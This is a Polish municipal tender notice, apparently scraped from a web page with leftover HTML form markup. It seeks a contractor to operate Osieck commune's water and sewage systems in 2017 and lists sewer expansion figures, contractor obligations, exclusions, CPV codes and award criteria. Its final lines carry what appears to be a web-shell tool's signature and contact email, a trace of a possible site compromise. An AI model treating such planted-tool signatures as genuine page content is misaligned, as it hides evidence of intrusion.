Zamawiający zwraca szczególną uwagę, na konieczność bieżącego utrzymania                w czystości całej powierzchni zabrukowanej kostką na terenie oczyszczalni, która została przez Zamawiającego w roku 2015 oczyszczona z wszelkiej roślinności  traw i chwastów.   

Wykonawca winien uwzględnić w ofercie fakt, że w trakcie realizacji Umowy ( w roku 2017) zwiększy się łączna długość sieci kanalizacyjnej (tłocznej i grawitacyjnej), liczba pompowni ścieków, a co za tym idzie łączna liczba dostawców ścieków  (mieszkańcy Augustówki) oraz ilość ścieków dopływających do oczyszczalni. 
W związku z planowaną rozbudową zbiorczego systemu kanalizacji sanitarnej                                w Augustówce nastąpi również (w w/w okresie) rozbudowa istniejącej oczyszczalni ścieków w Osiecku do przepustowości średniej dobowej 360 m3/d i maksymalnej 460 m3/d.  Wykonawca powinien uwzględnić w ofercie trudności jakie mogą pojawić się w trakcie eksploatacji oczyszczalni podczas jej rozbudowy (prace budowlane będą prowadzone w czynnym obiekcie) oraz eksploatację rozbudowanej oczyszczalni, z większą ilością urządzeń, wynikającą z obsługi również drugiego  nowego ciągu technologicznego oczyszczalni.
 
 Zakres budowy kanalizacji sanitarnej w systemie grawitacyjno-tłocznym w miejscowości Augustówka wynosi:
1. Kanalizacja grawitacyjna DN200 PVC (sieć)		7 360 m,
2.Kanalizacja grawitacyjna DN160 PVC (przyłącza  	ok. 6 000 m
2. Kanalizacja tłoczna PE:
	DN 110 				660 m,
	DN 90				1 426 m
3. Przepompownia ścieków 					5 szt.,
4. Przyłącza kanalizacyjne 					ok. 260 szt. 


PROWADZENIE DOKUMENTACJI EKSPLOATOWANYCH OBIEKTÓW I URZĄDZEŃ. 

PONADTO  WYKONAWCA ZOBOWIAZANY BĘDZIE DO:
a)	Wyznaczenia i wskazania Zamawiającemu z imienia i nazwiska osoby bezpośrednio wykonującej obowiązki Wykonawcy na terenie Gminy Osieck. Nie należy przez to rozumieć, że Zamawiający wymaga tylko 1 osoby zaangażowanej do realizacji przedmiotu umowy.     
b)	Uczestniczenia w odbiorach sieci wodociągowych i kanalizacyjnych wybudowanych                w trakcie realizacji umowy, uczestniczenia w określaniu warunków technicznych planowanych przyłączy oraz wykonywania odbiorów przyłączy kanalizacyjnych i wodociągowych,
c)	Prowadzenia sprawozdawczości zgodnie z obowiązującymi przepisami, w tym m.in. książki eksploatacji obiektów  Stacji Uzdatniania Wody i OŚ Pogorzel  
d)	Przyjęcia do eksploatacji nowych odcinków sieci i urządzeń wodno-kanalizacyjnych związanych z przedmiotem zamówienia i na zasadach określonych w zamówieniu  w ramach rozbudowy infrastruktury, która odbywać się będzie staraniem i na koszt Właściciela,
e)	Przestrzegania zasad dobrych praktyk gospodarczych i ekologicznych, a także dbałości o unikanie konfliktu interesów,
f)	Informowania Inspektora ds. wodociągu i kanalizacji w Gminie Osieck o istotnych okolicznościach realizacji umowy,
g)	Umożliwienia Właścicielowi przeprowadzania kontroli stanu technicznego infrastruktury i przyjmowania wniosków i zaleceń odnoszących się do stanu powierzonego majątku,
h)	Zapewnienia należytego stanu sanitarnego wody zasilającej odbiorców i jakości ścieków odprowadzanych do wód powierzchniowych,
i)	Ponoszenia odpowiedzialności wobec sanitarno-ekologicznych służb państwowych sprawujących nadzór nad prawidłową pracą urządzeń wodno-kanalizacyjnych i oczyszczalni ścieków,
j)	Ponoszenia odpowiedzialności za szkody poniesione w wyniku klęsk żywiołowych, wyładowań atmosferycznych, współdziałanie na rzecz przywrócenia urządzeń do stanu pierwotnego,
k)	Uiszczania opłat i kar związanych z urządzeniami w przypadku przekroczenia norm określonych w właściwych przepisach,
l)	W przypadku prowadzenia robót w pasie drogowym w związku z wykonywaniem prac związanych z urządzeniami wodociągowymi i urządzeniami kanalizacyjnymi, do których utrzymania zgodnie z umową dzierżawy zobowiązany jest Wykonawca, dopełnić obowiązków wynikających z przepisów o drogach publicznych własnym staraniem i na własny koszt.

USŁUGA NIE OBEJMUJE:
a) Opłat Marszałkowskich.
b) Opłat z tytułu dozoru technicznego UDT.
c) Ponoszenia kosztów energii elektrycznej zasilającej urządzenia w Oczyszczalniach i pompowniach ścieków oraz w stacji uzdatniania wody i pompowniach na sieci wodociągowej.
d) Odczytywania stanów wodomierzy, poboru i rozliczania należnych opłat za dostarczoną         wodę i wprowadzone ścieki.
e) Wydawania warunków technicznych przyłączenia do gminnej sieci wodociągowej i
  kanalizacyjnej.
f) Wykonywania wymaganych badań jakości wody i ścieków.
g) Kosztów utrzymywania aktywności kart SIM w monitorowanych obiektach  OŚ, SUW, pompowniach.
h) Kosztów zakupu nowych materiałów np. wodomierze, zawory, złączki, plomby, rury,  
i) Wymaganej sprawozdawczości wynikającej z Rozporządzenia MŚ w sprawie rodzajów wyników pomiarów prowadzonych w związku z eksploatacją instalacji lub urządzenia i innych danych oraz terminów i sposobów ich prezentacji.   

<br /><br /><b>II.5) Główny kod CPV: </b>41110000-3<br /><b> Dodatkowe kody CPV:</b>65120000-0,
                65130000-3,
                90481000-2,
                90400000-1,
                90480000-5,
                65111000-4<br /><b>
                II.6) Całkowita wartość zamówienia </b><i>(jeżeli zamawiający podaje informacje o wartości zamówienia)</i>:
              
              <br />
              Wartość bez VAT:
              <br />
              Waluta:
              <br /><div style="padding-left: 20px"><br /><i>(w przypadku umów ramowych lub dynamicznego systemu zakupów  szacunkowa całkowita maksymalna wartość w całym okresie obowiązywania umowy ramowej lub dynamicznego systemu zakupów)</i></div><br /><b>
                II.7)
                Czy przewiduje się udzielenie zamówień, o których mowa w art. 67 ust. 1 pkt 6 i 7  lub w art. 134 ust. 6 pkt 3  ustawy Pzp:
              </b>
                nie
              <br /><b>II.8) Okres, w którym realizowane będzie zamówienie lub okres, na który została zawarta umowa ramowa lub okres, na który został ustanowiony dynamiczny system zakupów:</b><div style="padding-left: 20px">
                    data rozpoczęcia: 02/01/2017
                    data zakończenia: 31/12/2017<br /></div><br /><b>II.9) Informacje dodatkowe: </b></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>
                III.1) WARUNKI UDZIAŁU W POSTĘPOWANIU
              </b><br /><div style="padding-left: 20px"><b>III.1.1) Kompetencje lub uprawnienia do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów</b><br />
                Określenie warunków:
                <br />
                Informacje dodatkowe
                <br /><b>III.1.2)  Sytuacja finansowa lub ekonomiczna  </b><br />
                Określenie warunków:
                d)	jest w sytuacji ekonomicznej i finansowej zapewniającej realizację niniejszego zamówienia,<br />
                Informacje dodatkowe
                <br /><b>III.1.3) Zdolność techniczna lub zawodowa </b><br />
                Określenie warunków:
                Wykonawca dokona wypisu kadry zatrudnionych przez niego pracowników wraz ze wskazaniem Zamawiającemu z imienia i nazwiska osoby bezpośrednio wykonującej obowiązki Wykonawcy na terenie Gminy Osieck, wraz z podaniem posiadanych kwalifikacji i doświadczenia zawodowego, zatrudnionej na umowę o pracę (załącznik nr 9). Nie należy przez to rozumieć, że Zamawiający wymaga tylko 1 osoby zaangażowanej do realizacji przedmiotu umowy.     
2.Wykonawca przedstawi sprzęt, który znajduje się w jego posiadaniu ( na zasadzie własności/najmu/dzierżawy/możliwości wypożyczenia), niezbędny do realizacji przedmiotu zamówienia (załącznik nr 10).
<br />
                Zamawiający wymaga od wykonawców wskazania w ofercie lub we wniosku o dopuszczenie do udziału w postępowaniu imion i nazwisk osób wykonujących czynności przy realizacji zamówienia wraz z informacją o kwalifikacjach zawodowych lub doświadczeniu tych osób:
                
                  tak
                <br />
                Informacje dodatkowe:
                </div><b>
                III.2) PODSTAWY WYKLUCZENIA
              </b><br /><div style="padding-left: 20px"><b>III.2.1) Podstawy wykluczenia określone w art. 24 ust. 1  ustawy Pzp</b><br /><b>III.2.2) Zamawiający przewiduje wykluczenie wykonawcy na podstawie art. 24 ust. 5 ustawy Pzp</b>
                  nie
                <br /></div><b>
                III.3) WYKAZ OŚWIADCZEŃ SKŁADANYCH PRZEZ WYKONAWCĘ W CELU WSTĘPNEGO POTWIERDZENIA, ŻE NIE PODLEGA ON WYKLUCZENIU ORAZ SPEŁNIA WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ SPEŁNIA KRYTERIA SELEKCJI
              </b><br /><div style="padding-left: 20px"><b>
                  Oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu
                </b><br />
                  tak
                <br /><b>
                  Oświadczenie o spełnianiu kryteriów selekcji
                </b><br />
                  nie
                </div><b>
                III.4) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW , SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 3 USTAWY PZP:
              </b><br /><div style="padding-left: 20px"></div><b>
                III.5) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 1 USTAWY PZP
              </b><br /><div style="padding-left: 20px"><b>III.5.1) W ZAKRESIE SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU:</b><br />)  Oświadczenie o spełnianiu warunków udziału w postępowaniu, zgodnie z art. 25 a ust 1 ustawy Pzp o treści zgodnej z załącznikiem nr 2.
2)  Wykaz świadczonych usług, w zakresie niezbędnym do wykazania spełnienia warunku wiedzy i doświadczenia, wykonywanych w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy  w tym okresie, z podaniem ich rodzaju i wartości, daty zakończenia oraz załączeniem referencji (sporządzony według wzoru stanowiącego załącznik nr 4 do SIWZ
) Oświadczenie o braku podstaw do wykluczenia na podstawie art. 25a  ust. 1 ustawy Pzp o
treści załącznika nr 3,
<br /><b>III.5.2) W ZAKRESIE KRYTERIÓW SELEKCJI:</b><br /></div><b>
                III.6) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 2 USTAWY PZP
              </b><br /><div style="padding-left: 20px"></div><b>
                III.7) INNE DOKUMENTY NIE WYMIENIONE W pkt III.3) - III.6)
              </b><div style="padding-left: 20px"></div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA IV: PROCEDURA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>IV.1) OPIS </b><br /><b>IV.1.1) Tryb udzielenia zamówienia: </b>
                przetarg nieograniczony
              <br /><b>IV.1.2) Zamawiający żąda wniesienia wadium:</b><div style="padding-left: 20px">
                  nie
                </div><br /><b>IV.1.3) Przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b><div style="padding-left: 20px">
                  nie
                </div><br /><b>
                IV.1.4) Wymaga się złożenia ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /></div><br /><b>
                IV.1.5.) Wymaga się złożenia oferty wariantowej:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie oferty wariantowej
                <br />
                  nie
                <br />
                Złożenie oferty wariantowej dopuszcza się tylko z jednoczesnym złożeniem oferty zasadniczej:
                <br />
                  nie
                </div><br /><b>
                IV.1.6) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu
              </b><br /><i>
                (przetarg ograniczony, negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne)
              </i><div style="padding-left: 20px">
                Liczba wykonawców  <br />
                Przewidywana minimalna liczba wykonawców  <br />
                Maksymalna liczba wykonawców  <br />
                Kryteria selekcji wykonawców:
                <br /></div><br /><b>
                IV.1.7) Informacje na temat umowy ramowej lub dynamicznego systemu zakupów:
              </b><div style="padding-left: 20px">
                Umowa ramowa będzie zawarta:
                <br /><br />
                Czy przewiduje się ograniczenie liczby uczestników umowy ramowej:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                Zamówienie obejmuje ustanowienie dynamicznego systemu zakupów:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                W ramach umowy ramowej/dynamicznego systemu zakupów dopuszcza się złożenie ofert w formie katalogów elektronicznych:
                <br />
                  nie
                <br />
                Przewiduje się pobranie ze złożonych katalogów elektronicznych informacji potrzebnych do sporządzenia ofert w ramach umowy ramowej/dynamicznego systemu zakupów:
                <br />
                  nie
                </div><br /><b>IV.1.8) Aukcja elektroniczna </b><br /><b>
                Przewidziane jest przeprowadzenie aukcji elektronicznej </b><i>(przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem) </i>
                nie
              <br /><b>Należy wskazać elementy, których wartości będą przedmiotem aukcji elektronicznej: </b><br /><b>Przewiduje się ograniczenia co do przedstawionych wartości, wynikające z opisu przedmiotu zamówienia:</b><br />
                nie
              <br />

              
                Należy podać, które informacje zostaną udostępnione wykonawcom w trakcie aukcji elektronicznej oraz jaki będzie  termin ich udostępnienia:
              
              <br />
              Informacje dotyczące przebiegu aukcji elektronicznej: 
              <br />
              Jaki jest przewidziany sposób postępowania w toku aukcji elektronicznej i jakie będą warunki, na jakich wykonawcy będą mogli licytować (minimalne wysokości postąpień): 
              <br />
              Informacje dotyczące wykorzystywanego sprzętu elektronicznego, rozwiązań i specyfikacji technicznych w zakresie połączeń:
              <br />
              Wymagania dotyczące rejestracji i identyfikacji wykonawców w aukcji elektronicznej: 
              <br />


              Informacje o liczbie etapów aukcji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Aukcja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Czy wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu:
                
                  nie
                <br />
                Warunki zamknięcia aukcji elektronicznej:
                <br /></div><br /><b>IV.2) KRYTERIA OCENY OFERT </b><br /><b>IV.2.1) Kryteria oceny ofert: </b><br /><b>IV.2.2) Kryteria</b><br /><div style="padding-left: 20px"><table><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>cena</td><td>60</td></tr><tr><td>czas podjecia działań w celu usuniecia awarii</td><td>20</td></tr><tr><td>posiadany sprzęt</td><td>20</td></tr></table></div><br /><b>IV.2.3) Zastosowanie procedury, o której mowa w art. 24aa ust. 1 ustawy Pzp </b>(przetarg nieograniczony)
              <br />
                nie
              <br /><b>IV.3) Negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne </b><br /><b>IV.3.1) Informacje na temat negocjacji z ogłoszeniem</b><br />
              Minimalne wymagania, które muszą spełniać wszystkie oferty:
              <br /><br />
              Przewidziane jest zastrzeżenie prawa do udzielenia zamówienia na podstawie ofert wstępnych bez przeprowadzenia negocjacji
              
                nie
              <br />
              Przewidziany jest podział negocjacji na etapy w celu ograniczenia liczby ofert:
              
                nie
              <br />
              Należy podać informacje na temat etapów negocjacji (w tym liczbę etapów):
              <br /><br />
              Informacje dodatkowe
              <br /><br /><br /><b>IV.3.2) Informacje na temat dialogu konkurencyjnego</b><br />
              Opis potrzeb i wymagań zamawiającego lub informacja o sposobie uzyskania tego opisu:
              <br /><br />
              Informacja o wysokości nagród dla wykonawców, którzy podczas dialogu konkurencyjnego przedstawili rozwiązania stanowiące podstawę do składania ofert, jeżeli zamawiający przewiduje nagrody:
              <br /><br />
              Wstępny harmonogram postępowania:
              <br /><br />
              Podział dialogu na etapy w celu ograniczenia liczby rozwiązań:
              
                nie
              <br />
              Należy podać informacje na temat etapów dialogu:
              <br /><br /><br />
              Informacje dodatkowe:
              <br /><br /><b>IV.3.3) Informacje na temat partnerstwa innowacyjnego</b><br />
              Elementy opisu przedmiotu zamówienia definiujące minimalne wymagania, którym muszą odpowiadać wszystkie oferty:
              <br /><br />
              Podział negocjacji na etapy w celu ograniczeniu liczby ofert podlegających negocjacjom poprzez zastosowanie kryteriów oceny ofert wskazanych w specyfikacji istotnych warunków zamówienia:
              <br />
                nie
              <br />
              Informacje dodatkowe:
              <br /><br /><b>IV.4) Licytacja elektroniczna  </b><br />
              Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna:
              <br /><div style="padding-left: 20px"></div>

              Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych:
              <br /><div style="padding-left: 20px"></div>

              Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień:
              <br /><div style="padding-left: 20px"></div>

              Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Licytacja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Wykonawcy, którzy nie złożyli nowych postąpień, zostaną  zakwalifikowani do następnego etapu:
                
                  nie
                </div>

              Termin otwarcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Termin i warunki zamknięcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div><br />
              Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego, albo ogólne warunki umowy, albo wzór umowy:
              <br /><div style="padding-left: 20px"></div><br />
              Wymagania dotyczące zabezpieczenia należytego wykonania umowy: 
              <br /><div style="padding-left: 20px"></div><br />
              Informacje dodatkowe:
              <br /><div style="padding-left: 20px"></div><b>IV.5) ZMIANA UMOWY</b><br /><b>Przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy:</b>
                tak

                <br />
                Należy wskazać zakres, charakter zmian oraz warunki wprowadzenia zmian:
                <br />dopuszcza się wprowadzenie po porozumieniu z Wykonawcą drobnych zmian  korekt w umowie, ale nie powodujących istotnych zmian charakteru umowy<br /><b>IV.6) INFORMACJE ADMINISTRACYJNE </b><br /><br /><b>IV.6.1) Sposób udostępniania informacji o charakterze poufnym </b><i>(jeżeli dotyczy): </i><br /><br /><b>Środki służące ochronie informacji o charakterze poufnym</b><br /><br /><b>IV.6.2) Termin składania ofert lub wniosków o dopuszczenie do udziału w postępowaniu: </b><br />
              Data: 02/12/2016, godzina: 11:00,
              <br />
              Skrócenie terminu składania wniosków, ze względu na pilną potrzebę udzielenia zamówienia (przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem):
              <br />
                nie
              <br />
              Wskazać powody:
              <br /><br />
              Język lub języki, w jakich mogą być sporządzane oferty lub wnioski o dopuszczenie do udziału w postępowaniu
              <br />&gt;
              <br /><b>IV.6.3) Termin związania ofertą: </b>
                okres w dniach: 30 (od ostatecznego terminu składania ofert)
              <br /><b>IV.6.4) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia:</b>
                nie
              <br /><b>IV.6.5) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, jeżeli środki służące sfinansowaniu zamówień na badania naukowe lub prace rozwojowe, które zamawiający zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia, nie zostały mu przyznane</b>
                nie
              <br /><b>IV.6.6) Informacje dodatkowe:</b><br /></div></div></div>

Creat By MiNi SheLL
Email: jattceo@gmail.com